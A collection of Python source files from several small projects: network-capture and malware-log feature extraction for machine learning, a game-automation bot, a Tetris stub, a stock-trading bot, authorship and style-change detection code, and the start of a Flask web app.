from sklearn.feature_extraction.text import CountVectorizer

###################################################
#################### WLAN IOT #####################

f = open("IOTwireless.csv", "w")
f.writelines("version,Pad,Len,Rate,ChannelFrequency,ChannelFlags,dBm_AntSignal,Antenna,subtype,\
type,proto,FCfield,ID,addr1,addr2,addr3,SC,addr4,Dot11Elt1.ID,Dot11Elt1.len,Dot11Elt1.info\n")

def wiot(frame):
    if frame.haslayer(Dot11):
        for packets in frame:
            f.writelines('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,' % (
                frame.version, frame.pad, frame.len,
                frame.Rate, frame.ChannelFrequency, frame.ChannelFlags, frame.dBm_AntSignal, frame.Antenna,
                frame.subtype, frame.type, frame.proto, frame.FCfield, frame.ID,
                frame.addr1, frame.addr2, frame.addr3, frame.SC, frame.addr4))
            if packets.haslayer(Dot11Elt):
                packets = Dot11Elt()
                f.writelines('%s,%s,%s,' % (frame.payload.ID, frame.payload.len, frame.info.decode()))
        f.writelines('\n')

sniff(offline=input("Enter the Pcap file:"), prn=wiot)

#######################################################
#################### TCP IOT ##########################

ip_filter = {}  # python dictionary
ip_filter['TCP_Mobile'] = "'tcp && (ip.src==192.168.1.45)'"
ip_filter['TCP_Outlet'] = "'tcp && (ip.src==192.168.1.222) || \
(ip.src==192.168.1.67)'"
ip_filter['TCP_Assistant'] = "'tcp && (ip.src==192.168.1.111) || \
(ip.src==192.168.1.30) || (ip.src==192.168.1.42) \
|| (ip.src==192.168.1.59) || (ip.src==192.168.1.70)'"
ip_filter['TCP_Camera'] = "'tcp && (ip.src==192.168.1.128) || \
(ip.src==192.168.1.145) || (ip.src==192.168.1.78)'"
ip_filter['TCP_Miscellaneous'] = "'tcp && (ip.src==192.168.1.216) \
|| (ip.src==192.168.1.46) || (ip.src==192.168.1.84) \
|| (ip.src==192.168.1.91)'"

#############################################################

labelFeature = open("label_feature_IOT.csv", 'a')  # vector space
labelFeature.writelines("Label,IPLength,IPHeaderLength,TTL,\
Protocol,SourcePort,DestPort,SequenceNumber,AckNumber\
,WindowSize,TCPHeaderLength,TCPLength,TCPStream\
,TCPUrgentPointer,IPFlags,IPID,IPchecksum,TCPflags,TCPChecksum\n")

#################################################################

def iot(**ip_filter):
    for original in glob.glob('original_pcap/*.pcap'):
        for k in ip_filter.keys():
            os.system("tshark -r " + original + " -w- -Y " + ip_filter[k] + ">> filtered_pcap/" + k + ".pcap")

#################################################################

for filteredFile in glob.glob('filtered_pcap/*.pcap'):
    #print(filteredFile)
    filename = filteredFile.split('/')[-1]
    label = filename.replace('.pcap', '')
    tsharkCommand = "tshark -r " + filteredFile + " -T fields \
-e ip.len -e ip.hdr_len -e ip.ttl \
-e ip.proto -e tcp.srcport -e tcp.dstport -e tcp.seq \
-e tcp.ack -e tcp.window_size_value -e tcp.hdr_len -e tcp.len \
-e tcp.stream -e tcp.urgent_pointer \
-e ip.flags -e ip.id -e ip.checksum -e tcp.flags -e tcp.checksum"
    allFeatures = str(os.popen(tsharkCommand).read())
    allFeatures = allFeatures.replace('\t', ',')
    allFeaturesList = allFeatures.splitlines()
    for features in allFeaturesList:
        labelFeature.writelines(label + "," + features + "\n")

###############################################################
######################## Malware ##############################

path = 'log_files'

########################################

labels = []
text = []

#########################################

#Path = ('log_files')
for filename in os.listdir(path):
    if "Good" in filename:
labels.append("1") else: labels.append("-1") filename = os.path.join(path, filename) print(filename) with open(filename, encoding="utf-8") as f: content = f.read() content.replace(",", " ") content.replace('"', " ") text.append(content) ## convert file contents into a sentence ########################################### vectorizer = CountVectorizer(stop_words='english', max_features=1000) ############################################ dtm = vectorizer.fit_transform(text) df = pd.DataFrame(dtm.toarray(), index=labels, \ columns=vectorizer.get_feature_names()) df.index.name = "labels" df.to_csv(r'DynamicMalwareMatrix.csv') ################################################# def malware(): features_list = vectorizer.get_feature_names() for feature in features_list: print (str(feature)) ################################################# ```
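The malware section above reduces each log file to one labeled row of token counts via `CountVectorizer`. A small self-contained sketch of that step (the two strings stand in for log-file contents; note that `get_feature_names` became `get_feature_names_out` in scikit-learn >= 1.2):

```python
# Self-contained sketch of the document-term-matrix step used above.
from sklearn.feature_extraction.text import CountVectorizer
import pandas as pd

docs = ["open socket send payload", "open file read config"]  # stand-ins for log files
vec = CountVectorizer(stop_words='english', max_features=1000)
dtm = vec.fit_transform(docs)
df = pd.DataFrame(dtm.toarray(), index=["-1", "1"], columns=vec.get_feature_names())
print(df)  # one labeled row of token counts per document
```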
{ "source": "8-prime/magnetem_bot", "score": 3 }
#### File: 8-prime/magnetem_bot/beating_elke.py
```python
from datetime import datetime
import pyautogui
from pynput import keyboard
import sys

#center button to switch sides 1280,1220
#left button 1080, 1220
#right button 1480
left = (1080, 1220)
center = (1280, 1220)
right = (1480, 1220)

#state 0: blue left, red right
state = 0

#left first bound
l1 = 2049000
#left second bound
l2 = 2049200
#right first bound
r1 = 2049380
#right second bound
r2 = 2049560

#height for pixels in the middle
#left end of the screen
#1000 and right 1560
# left end of left 1200
# right end of right 1360

def on_press(key):
    sys.exit()

def on_release(key):
    sys.exit()

def set_state_and_color(px_list, state, time):
    time = datetime.now()
    #col left: red 1, blue 0
    c_left = -1
    #col right: red 1, blue 0
    c_right = -1
    #check color left
    for i in range(l1, l2):
        if px_list[i][0] > 200 and px_list[i][2] < 200:
            #left is red
            c_left = 1
        elif px_list[i][0] < 200 and px_list[i][2] > 200:
            #left is blue
            c_left = 0
    #check for color on the right
    for i in range(r1, r2):
        if px_list[i][0] > 200 and px_list[i][2] < 200:
            #right is red
            c_right = 1
        elif px_list[i][0] < 200 and px_list[i][2] > 200:
            #right is blue
            c_right = 0
    if c_left == -1 and c_right == 0:
        pyautogui.moveTo(left)
    if c_left == -1 and c_right == 1:
        pyautogui.moveTo(right)
    if c_left == 0 and c_right == -1:
        pyautogui.moveTo(left)
    if c_left == 1 and c_right == -1:
        pyautogui.moveTo(right)
    if c_left == c_right and c_left == 0:
        #mouse to left
        pyautogui.moveTo(left)
    if c_left == c_right and c_left == 1:
        #mouse to right
        pyautogui.moveTo(right)
    if c_left == 0 and c_right == 1:
        if state == 1:
            pyautogui.mouseUp()
            pyautogui.click(center)
            pyautogui.moveRel(0, -300)
            state = 0
    if c_right == 0 and c_left == 1:
        if state == 0:
            pyautogui.mouseUp()
            pyautogui.click(center)
            pyautogui.moveRel(0, -300)
            state = 1

start = datetime.now().timestamp() * 1000

#keylistener
listener = keyboard.Listener(
    on_press=on_press,
    on_release=on_release)
listener.start()

while(True):
    if (datetime.now().timestamp() * 1000) - start > 5:
        image = pyautogui.screenshot()
        pixel_val = list(image.getdata())
        set_state_and_color(pixel_val, state, start)
        pyautogui.mouseDown()  #keep mouse pressed
```
{ "source": "8-prime/tetris_ml", "score": 3 }
#### File: tetris_ml/tetris/tetris.py
```python
import pygame, sys
from enum import Enum
from pygame.locals import *

pygame.init()

#colors needed for the blocks
RED = (255, 0, 0)
BLUE = (0, 0, 255)
ORANGE = (255, 165, 0)
PINK = (255, 192, 203)
CYAN = (0, 255, 255)
GREEN = (0, 255, 0)
YELLOW = (255, 255, 0)
BACKGROUND = (0, 0, 0)

#the size of each individual square on the board in pixels
blocksize = 20

#the board for the blocks
board = [[RED, BLUE, ORANGE, PINK, CYAN, GREEN, YELLOW, RED, BLUE, ORANGE] for _ in range(40)]

def draw_board(screen):
    for y in range(40):
        for x in range(10):
            pygame.draw.rect(screen, board[y][x], (x * blocksize, y * blocksize, blocksize, blocksize))

FPS = 30
FramePerSec = pygame.time.Clock()

(width, height) = (200, 800)
DISPLAYSURF = pygame.display.set_mode((width, height))
DISPLAYSURF.fill(BACKGROUND)
pygame.display.set_caption('Tetris')

while True:
    draw_board(DISPLAYSURF)
    pygame.display.update()
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
    FramePerSec.tick(FPS)

class Pice:
    def __init__(self, shape, color, x, y):
        self.c = color
        self.s = shape
        self.x = x
        self.y = y

#class Board:
```
{ "source": "8-prime/trading-bot", "score": 3 }
#### File: 8-prime/trading-bot/trade_gen_two.py
```python
import json
import time
from datetime import datetime
from scrape import get_daily_top_n
from alpha_vantage.timeseries import TimeSeries

'''
Global variables needed for operation
'''
key = ''
fd = './keyfile'
with open(fd, 'r') as file:
    key = file.readlines()
print(key)

ts = TimeSeries(key=key[0], output_format='pandas', indexing_type='integer')

CURRENT_PRICE_INDEX = '1. open'
SLEEP_DURATION = 900

stocks_of_interest = {}
data = {}
data['Money'] = 1000

'''
Because the script is only supposed to do things when the stock market is open,
the opening and closing times have to be saved
'''
opening_time = datetime.now().replace(hour=8, minute=0, second=0, microsecond=0)
closing_time = datetime.now().replace(hour=20, minute=0, second=0, microsecond=0)

'''
Structure for the data dictionary:
a stock has its name as the key and a dict as the value with the following fields
'name' : {
    'price_time_of_purchase'
    'sliding_average'
    'amount_held'
    'current_price'
}
The stocks_of_interest dictionary holds the names of stocks that are currently
interesting to the user as well as the price, so that it can be used immediately
when the stock is to be bought
'name' : {
    'current_price'
}
'''

def list_compare(a, b):
    sa = sorted(a)
    sb = sorted(b)
    if (len(sa) != len(sb)):
        return False
    for i in range(len(sa)):
        if sa[i] != sb[i]:
            return False
    return True

def persist():
    print('Writing data to file')
    with open('data.json', 'w') as file:
        json.dump(data, file, indent=4)

def test_for_buying():
    print('Looking at potential stocks to buy')
    if data['Money'] > 0:
        names_interested = list(stocks_of_interest.keys())
        for name in names_interested:
            if data['Money'] > stocks_of_interest[name]['current_price']:
                print('Buying ' + name + ' for: ' + str(stocks_of_interest[name]['current_price']) + '$')
                data['Money'] -= stocks_of_interest[name]['current_price']
                if not name in list(data.keys()):
                    data[name] = {}
                    data[name]['amount_held'] = 1
                else:
                    data[name]['amount_held'] += 1
                data[name]['current_price'] = stocks_of_interest[name]['current_price']
                data[name]['sliding_average'] = stocks_of_interest[name]['current_price']

#when checking for stocks to sell, iterate through the list of keys,
#exclude 'Money' and then check if the condition to sell is met
def test_for_selling():
    stock_list = list(data.keys())
    stock_list.remove('Money')
    print('Testing for sellable stocks')
    for stock in stock_list:
        # the original compared against a never-set 'price_top' key, which would
        # raise a KeyError; the sliding average is the only tracked reference price
        if data[stock]['current_price'] < data[stock]['sliding_average']:
            print('Selling ' + stock)
            data['Money'] += data[stock]['current_price'] * data[stock]['amount_held']
            del data[stock]

#update data for the stocks of interest
def update_interested():
    print('Updating stocks of interest')
    names_interested = list(stocks_of_interest.keys())
    for name in names_interested:
        while True:
            try:
                updated_price = ts.get_intraday(name)
                stocks_of_interest[name]['current_price'] = updated_price[0][CURRENT_PRICE_INDEX][0]
                print('Updated potential stock ' + name)
                break  # break (not return) so the remaining names still get updated
            except Exception:
                pass

#update data for the owned stocks
def update_held_stocks():
    names_held_stocks = list(data.keys())
    names_held_stocks.remove('Money')
    print('Updating held stocks')
    for name in names_held_stocks:
        while True:
            try:
                updated_price = ts.get_intraday(name)
                data[name]['sliding_average'] = (data[name]['sliding_average'] +
                                                 updated_price[0][CURRENT_PRICE_INDEX][0]) / 2
                data[name]['current_price'] = updated_price[0][CURRENT_PRICE_INDEX][0]
                print('Updated held stock ' + name)
                break  # break (not return) so the remaining names still get updated
            except Exception:
                pass

def populate_of_interest():
    names_of_interest = get_daily_top_n(5)
    print('Top five retrieved')
    global stocks_of_interest
    # if the list has changed it will be replaced by the new top n
    if not stocks_of_interest or not list_compare(names_of_interest, list(stocks_of_interest.keys())):
        print('New stocks found')
        stocks_of_interest = {}
        for name in names_of_interest:
            while True:
                try:
                    print('Trying to retrieve data for ' + name)
                    current_price_history = ts.get_intraday(name)
                    stocks_of_interest[name] = {
                        'current_price': current_price_history[0][CURRENT_PRICE_INDEX][0]
                    }
                    break
                except ValueError:
                    # catches the case that the name from the daily top n is not available through alpha vantage
                    break
                except Exception:
                    # catches the exception thrown when the max api calls were used
                    pass

while True:
    #if True:#opening_time > datetime.now() and datetime.now() < closing_time:
    #stockmarket is open baby
    populate_of_interest()
    update_held_stocks()
    update_interested()
    test_for_selling()
    test_for_buying()
    persist()
    time.sleep(SLEEP_DURATION)
```
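The update rule in `update_held_stocks`, `avg = (avg + price) / 2`, is an exponential moving average that gives the newest quote weight 1/2 and lets older quotes decay geometrically. A tiny worked sketch:

```python
# Worked sketch of the (avg + price) / 2 update used in update_held_stocks.
avg = 100.0
for price in (102.0, 104.0, 104.0):
    avg = (avg + price) / 2
print(avg)  # 103.25 -- weights are 1/2, 1/4, 1/8, ... from newest to oldest quote
```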
{ "source": "8sukanya8/koppel_pseudodepigraphia", "score": 3 }
#### File: koppel_pseudodepigraphia/koppel_pseudodepigraphia/imposter.py
```python
import preprocess_NLP_pkg
import koppel_pseudodepigraphia.config
import re
import os

def create_imposters_from_author_dict(dictionary, token_path):
    for author in dictionary.keys():
        list_of_books = dictionary[author]
        create_imposters(author, list_of_books, token_path)

def create_imposters(author, list_of_books, token_path):
    for book in list_of_books:
        book_text = preprocess_NLP_pkg.read_file(token_path + "/" + book, 'rb')
        book_sub_texts = split_n_parts(book_text, koppel_pseudodepigraphia.config.imposter_sub_text_size)  # sub text list
        n_sub_texts = len(book_sub_texts)  # number of sub texts
        for j in range(0, n_sub_texts):
            book_name = re.sub(".txt", "", book)
            sub_text_name = author + "_" + book_name + "_" + str(j) + ".txt"
            print(sub_text_name)
            preprocess_NLP_pkg.write_file(koppel_pseudodepigraphia.config.imposters_folder_path + "/" + sub_text_name,
                                          book_sub_texts[j], mode='wb')

def load_imposters(imposters_path):
    files_in_path = os.listdir(imposters_path)
    imposters_docs_names = list(file for file in files_in_path if re.search(".txt", file))
    return imposters_docs_names

def split_n_parts(text, n=2):
    """ Splits a given text into a list of sub texts of size n each
    Keyword arguments:
        text -- the text to be split
        n -- size of sub-text
    """
    if n > len(text):
        print("Error! Sub text size is greater than text!")
        return
    else:
        text_parts_list = [text[i:i + n] for i in range(0, len(text), n)]
        return text_parts_list[:-1]  # removing last element as it might have size less than n
```
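`split_n_parts` always drops the final chunk, which keeps every imposter segment at exactly `n` characters but also discards a full-sized last chunk when the length divides evenly. A quick behavioral sketch:

```python
# Quick behavioral sketch of split_n_parts as defined above.
text = b"abcdefghij"             # 10 bytes, read with mode 'rb' as in create_imposters
print(split_n_parts(text, n=4))  # [b'abcd', b'efgh'] -- the short tail b'ij' is discarded
print(split_n_parts(text, n=5))  # [b'abcde'] -- note a full-sized last chunk is dropped too
```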
{ "source": "8sukanya8/preprocess_NLP_pkg", "score": 4 }
#### File: preprocess_NLP_pkg/preprocess_NLP_pkg/text_processing.py
```python
import re, unicodedata
import inflect
from nltk.stem import LancasterStemmer, WordNetLemmatizer

def tokenize(character_seq, delimiter, remove_chars=None):
    """Removes given characters from a character sequence and splits according to the given delimiter
    Keyword arguments:
        character_seq -- character sequence to be split
        delimiter -- to split the character sequence
        remove_chars -- the characters to remove
    """
    if remove_chars is not None:  # the original tested 'remove_chars.len', which does not exist
        for i in remove_chars:
            character_seq = re.sub(i, "", character_seq)  # the original discarded the re.sub result
    tokens = character_seq.split(delimiter)
    return tokens

def paragraph_tokenizer(text, delimiter='\n\n'):
    """Given a text, break it down into paragraphs
    Keyword arguments:
        text -- given text
        delimiter -- type of delimiter to be used, default value is '\n\n'
    """
    paragraphs = text.split(delimiter)
    return paragraphs

def remove_non_ascii(word_list):
    """Remove non-ASCII characters from list of tokenized word_list
    Keyword arguments:
        word_list: list of words
    """
    new_word_list = []
    for word in word_list:
        new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')
        new_word_list.append(new_word)
    return new_word_list

def to_lowercase(word_list):
    """Convert all characters to lowercase from list of tokenized word_list
    Keyword arguments:
        word_list: list of words
    """
    lowercase_word_list = [word.lower() for word in word_list]
    return lowercase_word_list

def remove_punctuation(word_list):
    """Remove punctuation from list of tokenized word_list
    Keyword arguments:
        word_list: list of words
    """
    new_word_list = []
    #[re.sub(r'[^\w\s]', '', word) for word in word_list if re.sub(r'[^\w\s]', '', word) != '']
    for word in word_list:
        new_word = re.sub(r'[^\w\s]', '', word)
        if new_word != '':
            new_word_list.append(new_word)
    return new_word_list

def replace_numbers(word_list):
    """Replace all integer occurrences in list of tokenized word_list with textual representation
    Keyword arguments:
        word_list: list of words
    """
    p = inflect.engine()
    new_word_list = []
    for word in word_list:
        if word.isdigit():
            new_word = p.number_to_words(word)  # the original called a nonexistent 'number_to_word_list'
            new_word_list.append(new_word)
        else:
            new_word_list.append(word)
    return new_word_list

'''
def remove_stopword_list(word_list):
    """Remove stop word_list from list of tokenized word_list"""
    new_word_list = []
    for word in word_list:
        if word not in stopword_list.word_list('english'):
            new_word_list.append(word)
    return new_word_list
'''

def stem_word_list(word_list):
    """Stem word_list in list of tokenized word_list
    Keyword arguments:
        word_list: list of words
    """
    stemmer = LancasterStemmer()
    stems = []
    for word in word_list:
        stem = stemmer.stem(word)
        stems.append(stem)
    return stems

def lemmatize_verbs(word_list):
    """Lemmatize verbs in list of tokenized word_list
    Keyword arguments:
        word_list: list of words
    """
    lemmatizer = WordNetLemmatizer()
    return [lemmatizer.lemmatize(word, pos='v') for word in word_list]

def process_word_list(word_list):
    """Process the word list with different techniques such as non ascii removal, conversion to lowercase, removing punctuation etc.
Keyword arguments: word_list: list of words """ word_list = remove_non_ascii(word_list) word_list = to_lowercase(word_list) word_list = remove_punctuation(word_list) word_list = replace_numbers(word_list) #word_list = remove_stopword_list(word_list) return word_list def window_tokenizer(text, window_size = 5000, step_size = 100): """Given a text, break it down into windows of mentioned size, skipping characters mentioned in step size Keyword arguments: text -- given text window_size - number of characters in a window step_size - number of characters to skip before beginning next windows """ windows = [] i = 0 while i < (len(text)-window_size + step_size): window = text[i:i + window_size] windows.append(window) i = i + step_size return windows ```
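A minimal sketch of how these helpers compose, assuming the functions above are in scope and the `inflect` package is installed (the sample sentence is a made-up demo value):

```python
words = tokenize("Chapter 3: The 2 cities, revisited!", " ")
words = process_word_list(words)
# Lowercased, punctuation stripped, digits spelled out by inflect:
print(words)  # ['chapter', 'three', 'the', 'two', 'cities', 'revisited']
```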
{ "source": "8sukanya8/SCD_CLEF_2019", "score": 3 }
#### File: algorithms/window_merge_clustering/executor.py
```python
from src.algorithms.window_merge_clustering.feature_selection import calculate_window_distance_with_selected_words
import re
import preprocess_NLP_pkg
from statistics import mean, stdev
from src.algorithms.preprocessing import paragraph_tokenizer
from src.algorithms.window_merge_clustering.ClusterCollection import ClusterCollection
from src.algorithms.window_merge_clustering.Cluster import Cluster
import numpy as np
from src.algorithms.threshold_clustering.executor import is_duplicated


def update_cluster_label(windows, selected_words):
    """
    Calculates distance matrix, finds the windows which have the most similarity, merges the labels of those
    windows and returns the updated cluster labels
    :param windows: list of windows (text)
    :param selected_words: list of selected word features
    :return: updated cluster labels
    """
    labels = ['w' + str(i) for i in range(0, len(windows))]
    cluster_labels = []
    while len(windows) > 1:
        result = calculate_window_distance_with_selected_words(windows, preprocess_NLP_pkg.symmetric_kullback_leibler_divergence, selected_words)
        flat = np.array([val for val in result.flatten() if val > 0])
        min_dist = flat.min()
        w1, w2 = np.where(result == min_dist)
        #print(labels[w1[0]], labels[w2[0]], min_dist)
        cluster_labels.append((labels[w1[0]], labels[w2[0]], min_dist))
        windows, labels = merge_windows(w1[0], w2[0], windows, labels)
    return cluster_labels


def generate_clusters(cluster_labels):
    """
    Accepts cluster labels in the format [("w0w1", "w3", dist)]. For each label, identifies how many windows
    are present in position 1 and 2.
        - If both positions contain 1 window each, a new cluster is created with these two as members
        - If one position contains 1 window and the other more than one window, then the case is treated as
          adding a member to a cluster
        - If both positions contain more than one window, then the case is treated as merging two clusters.
    :param cluster_labels: labels of the clusters. For example, label (w1w2) means a cluster with members window 1 and window 2
    :return: a ClusterCollection object
    """
    cluster_list_obj = ClusterCollection()
    for label in cluster_labels:
        windows_pos_1 = list(set(re.findall('w\d*', label[0])))
        windows_pos_2 = list(set(re.findall('w\d*', label[1])))
        dist = label[2]
        if len(windows_pos_1) == 1 and len(windows_pos_2) > 1:
            # treat as adding a member to a cluster
            member = windows_pos_1[0]
            existing_cluster = cluster_list_obj.find_cluster_with_members(windows_pos_2)
            if existing_cluster is not None:
                new_cluster = Cluster(member1=member, distance=dist, cluster1=existing_cluster)
                cluster_list_obj.add_cluster(new_cluster)
            else:
                print("Error! No cluster found containing members", windows_pos_2, "\n Skipping entry", windows_pos_1, windows_pos_2)
        elif len(windows_pos_2) == 1 and len(windows_pos_1) > 1:
            # treat as adding a member to a cluster
            member = windows_pos_2[0]
            existing_cluster = cluster_list_obj.find_cluster_with_members(windows_pos_1)
            if existing_cluster is not None:
                new_cluster = Cluster(member1=member, distance=dist, cluster1=existing_cluster)
                cluster_list_obj.add_cluster(new_cluster)
            else:
                print("Error! No cluster found containing members", windows_pos_1, "\n Skipping entry", windows_pos_2, windows_pos_1)
        elif len(windows_pos_1) == 1 and len(windows_pos_2) == 1:
            # treat as creating a cluster with two members
            member1 = windows_pos_1[0]
            member2 = windows_pos_2[0]
            new_cluster = Cluster(member1=member1, distance=dist, member2=member2)
            cluster_list_obj.add_cluster(new_cluster)
        elif len(windows_pos_1) > 1 and len(windows_pos_2) > 1:
            # treat as merging two clusters together
            existing_cluster_1 = cluster_list_obj.find_cluster_with_members(windows_pos_1)
            existing_cluster_2 = cluster_list_obj.find_cluster_with_members(windows_pos_2)
            if existing_cluster_1 is not None and existing_cluster_2 is not None:
                new_cluster = Cluster(distance=dist, cluster1=existing_cluster_1, cluster2=existing_cluster_2)
                cluster_list_obj.add_cluster(new_cluster)
        #cluster_list_obj.print()
    #cluster_list_obj.print()
    return cluster_list_obj


def merge_windows(w1_index, w2_index, windows, cluster_labels):
    """
    Merges the two given windows and returns updated merged windows and corresponding labels
    :param w1_index: window 1 index
    :param w2_index: window 2 index
    :param windows: list of windows (text)
    :param cluster_labels: labels of the clusters. For example, label (w1w2) means a cluster with members window 1 and window 2
    :return: new merged windows and new labels
    """
    #print(w1_index, w2_index, cluster_labels)
    new_windows = [val for index, val in enumerate(windows) if index not in [w1_index, w2_index]]
    selected_indices = [i for i in range(0, len(cluster_labels)) if i not in [w1_index, w2_index]]
    new_labels = [cluster_labels[i] for i in selected_indices]
    new_windows.append(windows[w1_index] + windows[w2_index])
    new_labels.append(cluster_labels[w1_index] + cluster_labels[w2_index])
    #print(new_labels)
    return (new_windows, new_labels)


def get_number_of_authors(cluster_list_obj, rejected_windows, windows):
    """
    Uses the length of the cluster_list_obj to generate a preliminary number of authors. Thereafter, the size
    of the rejected windows which could not be part of any cluster is evaluated. If the char count of a rejected
    window is found to be of significant length, then the number of authors is increased.
    :param cluster_list_obj: collection of clusters found so far
    :param rejected_windows: window labels that could not be clustered
    :param windows: list of windows (text)
    :return: predicted number of authors
    """
    # increases author number for each rejected window with size > mean window size
    #print("rejected", rejected_windows)
    authors = len(cluster_list_obj)
    if rejected_windows is None:
        return authors
    labels = ['w' + str(i) for i in range(0, len(windows))]
    win_len_arr = np.array([len(win) for win in windows])
    greater_than_threshold = 0
    for i in range(0, len(windows)):
        if labels[i] in rejected_windows:
            #print(labels[i], len(windows[i]), mean(win_len_arr), stdev(win_len_arr))
            if len(windows[i]) > (mean(win_len_arr) + stdev(win_len_arr)):
                #print("Author num bumped")
                greater_than_threshold = greater_than_threshold + 1
    authors = authors + greater_than_threshold
    return authors


def execute_window_merge_clustering(text, use_duplication_feature=True):
    """
    From a text, creates a distance matrix from windows. Iteratively, the most similar windows are merged and
    the distance matrix recalculated. Iteration stops when there are no more windows to merge.
    :param text: text for which clustering is to be determined
    :param use_duplication_feature: Boolean for whether to use duplication for prediction
    :return: number of authors
    """
    try:
        if use_duplication_feature:
            if is_duplicated(text) < 2:
                number_of_authors = 1
                return number_of_authors
        windows = paragraph_tokenizer(text, remove_url=True, remove_empty_paragraphs=True)
        selected_words_freq_dist = preprocess_NLP_pkg.word_freq_count(text, number_of_terms=50)
        selected_words = list(selected_words_freq_dist.keys())
        new_cluster_labels = update_cluster_label(windows, selected_words)
        cluster_list_obj = generate_clusters(new_cluster_labels)
        trimmed_cluster_list_obj, rejected_windows = cluster_list_obj.cut_clusters_with_threshold(threshold=0.5)
        number_of_authors = get_number_of_authors(trimmed_cluster_list_obj, rejected_windows, windows)  # len(cluster_list_obj_cut)#
        if number_of_authors == 0:
            number_of_authors = 1
    except:
        print("Something went wrong. Appending the predicted authors with a 1")
        number_of_authors = 1
    return number_of_authors
```
#### File: SCD_CLEF_2019/src/load_data.py
```python
import os
import re
import fnmatch
import json


def load_files_from_dir(dir, pattern=None):
    """Given a directory, load files. If pattern is mentioned, load files with given pattern

    Keyword arguments:
    dir -- directory to read file names from
    pattern -- optional glob pattern the file names must match, default value is None
    """
    files_in_path = os.listdir(dir)
    docs_names = []
    if pattern is None:
        docs_names = list(file for file in files_in_path if re.search(".txt", file))
    else:
        try:
            docs_names = fnmatch.filter(os.listdir(dir), pattern)
        except TypeError:
            print("Error! pattern should be a string or bytes like object. Returning None")
            docs_names = None
    return docs_names


def load_txt_to_dict_vk(filepath, delimiter=','):
    """Given a filepath, load the contents in the format value,key into a dictionary in the format (key:value)

    Keyword arguments:
    filepath -- path to text file
    delimiter - type of delimiter to be used, default value is ','
    """
    d = {}
    with open(filepath) as f:
        for line in f:
            if not line.startswith("#"):
                line = re.sub('\n', '', line)
                (val, key) = line.split(delimiter)
                val_list = []
                if d.get(key):
                    val_list = val_list + d.get(key) + [val]
                    d[key] = val_list
                else:
                    val_list = val_list + [val]
                    d[key] = val_list
    return d


def load_txt_to_dict_kv(filepath, delimiter=','):
    """Given a filepath, load the contents in the format key,value into a dictionary in the format (key:value)

    Keyword arguments:
    filepath -- path to text file
    delimiter - type of delimiter to be used, default value is ','
    """
    d = {}
    with open(filepath) as f:
        for line in f:
            if not line.startswith("#"):
                line = re.sub('\n', '', line)
                (key, val) = line.split(delimiter)
                d[key] = val
    return d


def convert_dict_values_to_list(d, separator=' '):
    """Given a dictionary, split each string value on the separator so that every value becomes a list

    Keyword arguments:
    d -- dictionary whose values are strings
    separator - separator to split each value on, default value is ' '
    """
    for key in d.keys():
        d[key] = d.get(key).split(separator)
    return d


def write_result_to_output_dir(path, filename, result):
    """
    Writes the number of authors to a given file at a given location
    :param path: output directory path
    :param filename: output filename path
    :param result: number of authors
    :return:
    """
    if not os.path.exists(path):
        os.makedirs(path)
    with open(path + filename, 'w') as f:
        json.dump({"authors": result}, f)
```
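To see what `merge_windows` does in isolation, a toy run with three fake windows (purely illustrative values):

```python
windows = ["aaa ", "bbb ", "ccc "]
labels = ["w0", "w1", "w2"]
new_windows, new_labels = merge_windows(0, 2, windows, labels)
print(new_windows)  # ['bbb ', 'aaa ccc ']
print(new_labels)   # ['w1', 'w0w2']
```

The concatenated label `'w0w2'` is exactly the format that `generate_clusters` later splits back apart with `re.findall('w\d*', ...)`.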
{ "source": "8thmatyr/evnt-web", "score": 2 }
#### File: app/conf/config-gunicorn.py
```python
import os


def numCPUs():
    if not hasattr(os, 'sysconf'):
        raise RuntimeError('No sysconf detected.')
    return os.sysconf('SC_NPROCESSORS_ONLN')


bind = '0.0.0.0:8001'
workers = 4
# backlog = 2048
# worker_class = 'sync'
worker_class = 'gevent'
debug = True
daemon = True
pidfile = '/tmp/gunicorn.pid'
logfile = '/tmp/gunicorn.log'
# gunicorn -c config-gunicorn.py views:app
```
#### File: evnt-web/app/__init__.py
```python
__version__ = '0.1.0'

from flask import Flask
from flask import session, g
from flask import (render_template, url_for)
from flask import redirect, make_response, Flask
from flask import jsonify
from flask import abort, request
from json import dumps
from functools import wraps
import os
import logging
import hashlib
import uuid
from random import randint

app = Flask('app')
app.debug = True

import os
import rethinkdb as r
from rethinkdb import *
import psycopg2
import logging

logging.basicConfig(filename='TaskWangu.log', level=logging.DEBUG)

salt = '<PASSWORD>'

RDB_HOST = os.environ.get('RDB_HOST') or '127.0.0.1'
RDB_PORT = os.environ.get('RDB_PORT') or 28015
LINK_DB = 'LinkUs'

import requests
import simplejson

# conn_string = "host='172.16.17.32' dbname='LinkUs' user='synod' password='<PASSWORD>**//'"
# conn = psycopg2.connect(conn_string)
# cursor = conn.cursor()

ONLINE_LAST_MINUTES = 5
app.config[ONLINE_LAST_MINUTES] = 720
app.secret = 'I\<KEY>'


def dbSetup():
    connection = r.connect(host=RDB_HOST, port=RDB_PORT)
    try:
        r.db_create(LINK_DB).run(connection)
        r.db(LINK_DB).table_create('User').run(connection)
        logging.info('Database setup completed')
    except RqlRuntimeError:
        logging.info('App database already exists')
    finally:
        connection.close()


def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if session[username] is None:
            return redirect(url_for('index', next=request.url))
        return f(*args, **kwargs)
    return decorated_function


"""
@app.before_request
def log_request():
    log_data = "LOG_INFO=" + simplejson.dumps(
        {
            'Request': 'app.before',
        })
    requests.post("https://logs-01.loggly.com/inputs/e15fde1a-fd3e-4076-a3cf-68bd9c30baf3/tag/python/", log_data)
"""


@app.before_request
def before_request():
    try:
        logging.info('before_request')
        g.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=LINK_DB)
    except RqlDriverError:
        abort(503, "No database connection could be established")


@app.teardown_request
def teardown_request(exception):
    try:
        logging.info('teardown_request')
        g.rdb_conn.close()
    except AttributeError:
        pass


from userOps import *
from taskOps import *
```
#### File: app/userOps/profile_admin.py
```python
from app import app
from app import r
from app import g
from app import logging
from app import salt
from app import RqlError
from flask import (render_template, json)
from flask import redirect, make_response
from flask import Response, jsonify
from flask import abort, request
from flask import session
from datetime import timedelta
from json import dumps
import os
import logging
import hashlib
from random import randint
import time
from datetime import datetime


@app.route('/profile/<username>/', methods=['POST', 'GET'])
def profile(username):
    if request.method == 'POST':
        if not request.json:
